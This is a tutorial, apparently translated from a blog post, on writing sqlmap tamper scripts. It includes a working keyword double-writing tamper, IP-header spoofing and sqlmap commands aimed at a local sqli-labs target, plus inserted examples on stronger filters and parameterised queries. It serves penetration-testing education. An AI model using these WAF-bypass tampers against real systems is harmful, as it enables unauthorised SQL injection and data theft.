Writing a sqlmap tamper

Tamper in brief

sqlmap's --tamper parameter loads a user-defined script that modifies the payload during injection. This is how a WAF is bypassed, filtered keywords are replaced, and so on. The basic structure of a tamper is as follows:

#!/usr/bin/env python

"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW  # priority level at which this script is invoked

def dependencies():
    # declares which DBMS / situations the script does or does not apply to; may be empty
    pass

def tamper(payload, **kwargs):
    # main function, used to modify the payload and the request headers
    return payload
Save this as my.py in the sqlmap/tamper directory, then add the parameter --tamper=my when running sqlmap.

Simple Analysis

Let us take an official tamper (xforwardedfor.py) and analyze its structure:

#!/usr/bin/env python

"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import random

from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def randomIP():
    numbers = []

    while not numbers or numbers[0] in (10, 172, 192):
        numbers = random.sample(xrange(1, 255), 4)

    return '.'.join(str(_) for _ in numbers)

def tamper(payload, **kwargs):
    """
    Append a fake HTTP header 'X-Forwarded-For'
    """

    headers = kwargs.get("headers", {})
    headers["X-Forwarded-For"] = randomIP()
    headers["X-Client-Ip"] = randomIP()
    headers["X-Real-Ip"] = randomIP()
    return payload
It consists of the import section, the __priority__ attribute, the dependencies() function, the tamper() function and any user-defined helper functions (here randomIP()).

import

In this section we can import sqlmap's internal libraries, which give us many of the functions and data types sqlmap has already packaged, such as PRIORITY from sqlmap/lib/core/enums.py.

PRIORITY

PRIORITY defines the priority of a tamper. PRIORITY has the following values:
- LOWEST = -100
- LOWER = -50
- LOW = -10
- NORMAL = 0
- HIGH = 10
- HIGHER = 50
- HIGHEST = 100
If the user specifies several tampers, sqlmap gives precedence to the tamper with the higher level according to the __priority__ each tamper defines. If you need two tampers to work together, you need to pay attention to this.

dependencies

The dependencies() function is mainly used to prompt the user about which databases the tamper supports. The specific code is as follows:

#!/usr/bin/env python

"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS

__priority__ = PRIORITY.NORMAL

def dependencies():
    singleTimeWarnMessage("This is my tamper notice")

def tamper(payload, **kwargs):
    return payload

 


DBMS.MYSQL represents MySQL; the constants for the other databases can also be found in sqlmap/lib/core/enums.py.

 

 

 

tamper

The tamper() function is the most important part of a tamper; it is the function you must implement, and everything else is written around it. Its payload parameter is the original injection payload sqlmap generated: if the bypass works by modifying the payload, this is what you change. kwargs is used to modify the HTTP headers: if the bypass works by modifying the request headers, this is what you use.

Payload-based

First, the bypass by modifying the payload, for keyword substitution. I use the first level of sqli-labs and modify its source so that the malicious keywords are replaced with an empty string, to prevent UNION queries, as shown:

 

 

 

Write a tamper that bypasses this by double-writing the keywords:

def tamper(payload, **kwargs):
    payload = payload.lower()                           # work on a lower-cased payload
    payload = payload.replace('select','seleselectct')  # one deletion of 'select' leaves 'select'
    payload = payload.replace('union','ununionion')     # one deletion of 'union' leaves 'union'
    return payload

First, without the tamper. We add --tech=U so that sqlmap only tests UNION query injection; --flush-session means the session is refreshed on every run, clearing the previous cache.

sqlmap -u http://php.local/Less-1/?id=1 --tech=U --flush-session --proxy=http://127.0.0.1:8080 --random-agent --dbms=mysql

 

 

 

From the traffic in Burp we can see that the payload is not double-written, so the injection is bound to fail. Now with the tamper:

sqlmap -u http://php.local/Less-1/?id=1 --tech=U --flush-session --proxy=http://127.0.0.1:8080 --random-agent --tamper=my --dbms=mysql

 

 

 

The payload is double-written as expected, and the injection succeeds.
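To see why the double-written payload gets through, here is an added example (not code from the post or from sqlmap) that models the Less-1 filter described above two ways: the single-pass keyword deletion the modified source performs, and two stronger forms, stripping to a fixed point and rejecting the request outright. The filter functions, the keyword list and the sample payload are constructed for illustration; the tamper logic is the post's own.

```python
import re

# Keywords the modified Less-1 source deletes (constructed to match the post's description).
BLOCKED = ("union", "select")


def double_write_tamper(payload, **kwargs):
    """The post's tamper: lower-case the payload and wrap each blocked keyword in a copy of itself."""
    payload = payload.lower()
    payload = payload.replace("select", "seleselectct")
    payload = payload.replace("union", "ununionion")
    return payload


def strip_once(value):
    """Weak filter: each blocked keyword is deleted in a single pass (case-insensitive).
    Deleting the inner 'select' from 'seleselectct' re-assembles the outer 'select'."""
    for kw in BLOCKED:
        value = re.sub(kw, "", value, flags=re.IGNORECASE)
    return value


def strip_to_fixpoint(value):
    """Keep stripping until nothing changes, so keywords re-assembled by a deletion are removed too."""
    while True:
        stripped = strip_once(value)
        if stripped == value:
            return value
        value = stripped


def contains_blocked(value):
    """Reject-style check: True if any blocked keyword occurs anywhere, doubled or not.
    A filter that rejects instead of sanitising has no 'one deletion' window to exploit."""
    return any(re.search(kw, value, flags=re.IGNORECASE) for kw in BLOCKED)


if __name__ == "__main__":
    original = "1' UNION SELECT 1,2,3-- "          # constructed sample UNION payload
    tampered = double_write_tamper(original)
    print("tampered     :", tampered)
    print("strip_once   :", strip_once(tampered))          # keywords are back
    print("fixpoint     :", strip_to_fixpoint(tampered))   # keywords gone
    print("reject?      :", contains_blocked(tampered))    # True
```

The fixed-point and reject variants only close the specific gap shown here; keyword stripping is not a security boundary, and the fix for Less-1 is a parameterised query so that the id value is never parsed as SQL at all.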

 

 

 

HTTP header based

We use sqlmap/tamper/xforwardedfor.py to explain this:

def tamper(payload, **kwargs):
    """
    Append a fake HTTP header 'X-Forwarded-For'
    """

    headers = kwargs.get("headers", {})
    headers["X-Forwarded-For"] = randomIP()
    headers["X-Client-Ip"] = randomIP()
    headers["X-Real-Ip"] = randomIP()
    return payload

It takes the headers dictionary out of kwargs and then sets the values, so that the X-Forwarded-For (and related) headers carry a random IP. This is not elaborated further here.
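The header-based tamper works only because the headers dictionary is the same object sqlmap passed in, and the post's note on PRIORITY says the order of several tampers follows their levels. The following added example (not code from the post or from sqlmap) is a small harness that imitates how sqlmap calls a chain of tampers: it sorts them by __priority__, passes a shared headers dict, and includes a deliberately broken variant that copies the dict and therefore never changes the request. The harness, the broken variant and the assumption that the higher __priority__ runs first are mine; confirm the ordering against lib/core/option.py of the sqlmap version in use. random_ip() reproduces the logic of xforwardedfor.py and the double-write tamper is the post's.

```python
import random
import re

# PRIORITY values as listed in sqlmap's lib/core/enums.py (the numbers quoted in the post).
PRIORITY = {"LOWEST": -100, "LOWER": -50, "LOW": -10, "NORMAL": 0,
            "HIGH": 10, "HIGHER": 50, "HIGHEST": 100}


def random_ip():
    """Same rule as xforwardedfor.py: four distinct octets in 1..254, first octet never 10, 172 or 192."""
    numbers = []
    while not numbers or numbers[0] in (10, 172, 192):
        numbers = random.sample(range(1, 255), 4)
    return ".".join(str(n) for n in numbers)


def xff_tamper(payload, **kwargs):
    """Header-based tamper: mutates the caller's headers dict in place; the payload is returned untouched."""
    headers = kwargs.get("headers", {})  # the very dict object the harness (or sqlmap) passed in
    headers["X-Forwarded-For"] = random_ip()
    headers["X-Client-Ip"] = random_ip()
    headers["X-Real-Ip"] = random_ip()
    return payload


xff_tamper.__priority__ = PRIORITY["NORMAL"]


def broken_xff_tamper(payload, **kwargs):
    """Constructed mistake: copying the dict means the new header never reaches the request."""
    headers = dict(kwargs.get("headers", {}))  # a copy, so the write below is lost
    headers["X-Forwarded-For"] = random_ip()
    return payload


broken_xff_tamper.__priority__ = PRIORITY["NORMAL"]


def double_write_tamper(payload, **kwargs):
    """The post's payload-based tamper."""
    payload = payload.lower()
    payload = payload.replace("select", "seleselectct")
    payload = payload.replace("union", "ununionion")
    return payload


double_write_tamper.__priority__ = PRIORITY["LOW"]


def chain_order(tampers):
    """Names of the tampers in the order this harness applies them (assumption: higher __priority__ first)."""
    ordered = sorted(tampers, key=lambda fn: fn.__priority__, reverse=True)
    return [fn.__name__ for fn in ordered]


def run_tamper_chain(payload, tampers, headers):
    """Apply each tamper in priority order: the payload flows through, the headers dict is shared by reference."""
    for fn in sorted(tampers, key=lambda fn: fn.__priority__, reverse=True):
        payload = fn(payload, headers=headers)
    return payload, headers


IP_RE = re.compile(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$")


def looks_like_random_ip(value):
    """Validate a generated address against random_ip()'s own rules."""
    m = IP_RE.match(value)
    if not m:
        return False
    octets = [int(x) for x in m.groups()]
    return all(1 <= o <= 254 for o in octets) and octets[0] not in (10, 172, 192)


if __name__ == "__main__":
    hdrs = {"User-Agent": "constructed-example"}  # constructed request headers
    out, hdrs = run_tamper_chain("1' UNION SELECT 1,2,3-- ", [double_write_tamper, xff_tamper], hdrs)
    print(chain_order([double_write_tamper, xff_tamper]))
    print(out)
    print(hdrs)
```

The harness makes two points the post only states: a tamper that replaces or copies the headers object silently does nothing, and a tamper's effect on headers is visible to every tamper that runs after it in the chain.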

Summary

This post briefly describes how to write a tamper, using the double-write tamper as the demonstration. In an actual penetration test we need to write different tampers for different WAFs and use them flexibly.


Origin www.cnblogs.com/M0rta1s/p/11901791.html